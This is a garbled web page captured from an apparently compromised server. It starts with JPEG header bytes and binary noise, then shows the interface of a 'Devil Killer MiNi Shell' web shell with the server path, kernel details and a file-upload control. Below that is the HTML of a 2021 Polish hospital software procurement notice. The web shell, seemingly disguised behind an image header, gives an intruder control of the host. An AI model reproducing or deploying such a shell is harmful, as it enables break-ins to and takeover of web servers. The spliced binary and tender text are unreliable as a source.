JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210916/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210916/0018289502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup licencji i wdrożenie oprogramowania w ramach projektu pn. „Rozwój e-usług w obszarze zdrowia w Zespole Szpitali Miejskich w Chorzowie” (2) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ ZESPÓŁ SZPITALI MIEJSKICH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271503410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Strzelców Bytomskich 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">323499268</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">323499299</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zsm.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zsm.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup licencji i wdrożenie oprogramowania w ramach projektu pn. „Rozwój e-usług w obszarze zdrowia w Zespole Szpitali Miejskich w Chorzowie” (2) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6baafea1-15f2-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00182895</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00154725/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Zakup licencji komputerowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Rozwój e-usług w obszarze zdrowia w Zespole Szpitali Miejskich w Chorzowie </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zsm-chorzow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zsm-chorzow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie<br/>komunikował się z Wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>a) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się przy użyciu środków komunikacji elektronicznej tj. Platformy zakupowej:<br/>https://zsmchorzow.<br/>ezamawiajacy.pl. Ilekroć w dalszej części SWZ jest mowa o: „Platformie zakupowej” – należy<br/>przez to rozumieć narzędzie umożliwiające realizację procesu związanego z udzielaniem zamówień<br/>publicznych w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym służące w szczególności do przekazywania ofert, oświadczeń zwane dalej<br/>„Platformą” lub „eZamawiający”. Informacje dotyczące odpowiedniego przygotowania stanowiska<br/>Wykonawcy znajdą na stronie: https://oneplace.marketplanet.pl/przygotuj-stanowisko-pcwykonujacponizszekroki<br/>b) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Zespołu<br/>Szpitali Miejskich w Chorzowie; https://zsm-chorzow.ezamawiajacy.pl lub<br/>https://oneplace.marketplanet.pl.<br/>c) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>d) rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci<br/>elektronicznej.<br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu<br/>podanym w ww. potwierdzeniu.<br/>e) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja<br/>między Zamawiającym a Wykonawcami, w szczególności zawiadomienia, informacje oraz dokumenty<br/>przekazywane są w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń,<br/>informacji oraz dokumentów przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. 2. Obowiązek informacyjny wynikający z art. 13 RODO w<br/>przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego – Klauzula informacyjna dotycząca<br/>Zamawiającego została zamieszczona na ostatniej stronie specyfikacji warunków zamówienia (dalej w<br/>treści: SWZ). Natomiast, klauzula informacyjna dotycząca Wykonawcy ujęta jest w pkt 9 załącznika nr<br/>1 do SWZ – „Formularz ofertowy”. Wykonawca zobowiązany jest zapoznać wszystkich pracowników z<br/>klauzulą dot. powierzenia danych osobowych, a których dane zostaną przekazane Zamawiającemu w<br/>trakcie i po rozstrzygnięciu postępowania.<br/>RODO - Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04 maja 2016, str. 1-88).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSM/ZP/24/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 449850,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 1 – Zakup licencji wraz z dostawą i wdrożeniem zakupionego oprogramowania </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 418350,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48180000-3 - Pakiety oprogramowania medycznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72268000-1 - Usługi dostawy oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze i ocenie oferty Zamawiający będzie się kierować<br/>wyłącznie następującymi kryteriami:<br/>Cena - 60 %<br/>Okres świadczenia asysty powdrożeniowej - 40 %<br/>Na sumaryczną ocenę oferty Wykonawcy składają się punkty otrzymane w poszczególnych kryteriach.<br/>A. Kryterium „Cena” (Pc) sposób oceny ofert<br/>Ocena ofert w kryterium cena zostanie przeprowadzona na podstawie wyliczeń matematycznych<br/>zgodnie z poniższym wzorem.<br/>Liczba punktów (Pc) = najniższa cena/cena badanej oferty x 100 x 60 %<br/>Do wyliczenia punktowego w kryterium ceny zostanie przyjęta wartość brutto wyrażona w złotych<br/>zgodnie z danymi zamieszczonymi przez Wykonawcę w formularzu ofertowym.<br/>Maksymalna liczba punktów możliwa do uzyskania w niniejszym kryterium wynosi: 60 pkt<br/>B. Kryterium „Okres świadczenia asysty powdrożeniowej” (Pd) sposób oceny ofert<br/>Ocena kryterium zostanie dokonana na podstawie zdeklarowanych dni świadczenia asysty<br/>powdrożeniowej<br/>Wykonawca może zaoferować:<br/>• 15 dni asysty powdrożeniowej z wyłączeniem dni ustawowo wolnych od pracy (tj. niedziel i świąt)<br/>oraz sobót, zamawiający ofercie z taką ilością dni asysty przyzna 0 pkt<br/>• 18 dni asysty powdrożeniowej z wyłączeniem dni ustawowo wolnych od pracy (tj. niedziel i świąt)<br/>oraz sobót, zamawiający ofercie z taką ilością dni asysty przyzna 20 pkt<br/>• 21 dni asysty powdrożeniowej z wyłączeniem dni ustawowo wolnych od pracy (tj. niedziel i świąt)<br/>oraz sobót, zamawiający ofercie z taką ilością dni asysty przyzna 40 pkt<br/>Zamawiający zastrzega, że okres świadczenia asysty powdrożeniowej podany przez Wykonawcę w<br/>godzinach zostanie zmieniony na dni, natomiast podany w niepełnych dniach zostanie zaokrąglony w<br/>górę (np. 15,5 dnia zostanie zamieniony na 15 dni)<br/>Wykonawcy, który nie poda w ofercie okresu świadczenia asysty powdrożeniowej zostanie przyznane<br/>w niniejszym kryterium 0 pkt. Zamawiający w sytuacji opisanej powyżej uzna, że okres świadczenia<br/>asysty powdrożeniowej wyniesie 21 dni z wyłączeniem dni ustawowo wolnych od pracy (tj. niedziel i<br/>świąt) oraz sobót licząc od dnia wdrożenia oprogramowania.<br/>Maksymalna liczba punktów możliwa do uzyskania w niniejszym kryterium wynosi: 40 pkt<br/>Ocenę końcową oferty stanowić będzie suma punktów poszczególnych kryteriów obliczonych zgodnie<br/>z poniższym wzorem:<br/>Pc + Pd = Ocena końcowa oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres świadczenia asysty powdrożeniowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 2 – Zakup kwalifikowanych podpisów elektronicznych wraz z czytnikami oraz oprogramowaniem do obsługi podpisu cyfrowego </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 31500,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30160000-8 - Karty magnetyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30216200-8 - Czytniki kart magnetycznych</p> <p class="mb-0">35123100-3 - System kart magnetycznych</p> <p class="mb-0">79132100-9 - Usługi uwierzytelniania podpisu elektronicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze i ocenie oferty Zamawiający będzie się kierować<br/>wyłącznie następującymi kryteriami:<br/>Cena - 60 %<br/>Okres świadczenia asysty powdrożeniowej - 40 %<br/>Na sumaryczną ocenę oferty Wykonawcy składają się punkty otrzymane w poszczególnych kryteriach.<br/>A. Kryterium „Cena” (Pc) sposób oceny ofert<br/>Ocena ofert w kryterium cena zostanie przeprowadzona na podstawie wyliczeń matematycznych<br/>zgodnie z poniższym wzorem.<br/>Liczba punktów (Pc) = najniższa cena/cena badanej oferty x 100 x 60 %<br/>Do wyliczenia punktowego w kryterium ceny zostanie przyjęta wartość brutto wyrażona w złotych<br/>zgodnie z danymi zamieszczonymi przez Wykonawcę w formularzu ofertowym.<br/>Maksymalna liczba punktów możliwa do uzyskania w niniejszym kryterium wynosi: 60 pkt<br/>C. Kryterium „Okres ważności kwalifikowanego certyfikatu” (Pw) sposób oceny ofert<br/><br/>Ocena kryterium zostanie dokonana na podstawie zdeklarowanych miesięcy ważności kwalifikowanego certyfikatu<br/>Wykonawca może zaoferować:<br/>•	60 miesięcy ważności kwalifikowanego certyfikatu, zamawiający w ofercie przyzna 0 pkt<br/>•	72 miesięcy ważności kwalifikowanego certyfikatu, zamawiający w ofercie przyzna 20 pkt<br/>•	84 miesięcy ważności kwalifikowanego certyfikatu, zamawiający w ofercie przyzna 40 pkt<br/><br/>Zamawiający zastrzega, że okres ważności kwalifikowanego certyfikatu podany przez Wykonawcę w latach zostanie zmieniony na miesiące, natomiast podany w niepełnych miesiącach zostanie zaokrąglony w górę (np. 65 miesięcy zostanie zamienione na 72 miesiące). Wykonawcy, który nie poda w ofercie okresu ważności kwalifikowanego certyfikatu zostanie przyznane w niniejszym kryterium 0 pkt. Zamawiający w sytuacji opisanej powyżej uzna, że okres ważności kwalifikowanego certyfikatu wyniesie 60 miesięcy. Maksymalna liczba punktów możliwa do uzyskania w niniejszym kryterium wynosi: 40 pkt<br/><br/>Ocenę końcową oferty stanowić będzie suma punktów poszczególnych kryteriów obliczonych zgodnie<br/>z poniższym wzorem:<br/>Pc + Pw = Ocena końcowa oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres ważności kwalifikowanego certyfikatu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4.1.	O udzielenie zamówienia w postępowaniu mogą ubiegać się Wykonawcy, którzy: <br/>- nie podlegają wykluczeniu.<br/>- spełniają warunki udziału.<br/>4.2.	O udzielenie zamówienia w postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie ustanawia warunku. <br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie ustanawia warunku.<br/>c)	sytuacji ekonomicznej lub finansowej – Zamawiający nie ustanawia warunku.<br/>d)	zdolności technicznej lub zawodowej – warunek ten zostanie spełniony, jeśli: <br/>Wykonawca wykaże, że wykonał należycie w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 1 dostawę, której przedmiotem była dostawa i wdrożenie systemu Elektronicznej Dokumentacji Medycznej oraz e-Usług i ich integracja z HIS, o wartości co najmniej 200 000 PLN, poparte dokumentami potwierdzającymi należyte wykonanie dostawy, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy – dotyczy pakietu nr 1; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5.1.	Wykaz podmiotowych środków dowodowych, na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>a)	Wykaz wykonanych dostaw;, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, (zgodnie z załącznikiem nr 5 do SWZ), zawierający co najmniej 1 dostawę, której przedmiotem była dostawa i wdrożenie systemu Elektronicznej Dokumentacji Medycznej oraz e-Usług i ich integracja z HIS, o wartości co najmniej 200 000 PLN – dotyczy pakietu nr 1 – wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są:<br/>- referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane,<br/>- oświadczenie Wykonawcy - jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów. <br/>W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego została wykonana dostawa wskazana w wykazie (Załącznik nr 5 do SWZ), Wykonawca nie ma obowiązku przedkładania powyższych dowodów.<br/>UWAGA: nie można łączyć kilku zamówień na dostawę w celu uzyskania wymaganej kwotowo wartości.<br/>UWAGA: w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia do oceny spełnienia warunku będzie ich łączny potencjał. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę (na wezwanie Zamawiającego), Zamawiający może zwrócić się do właściwych organów 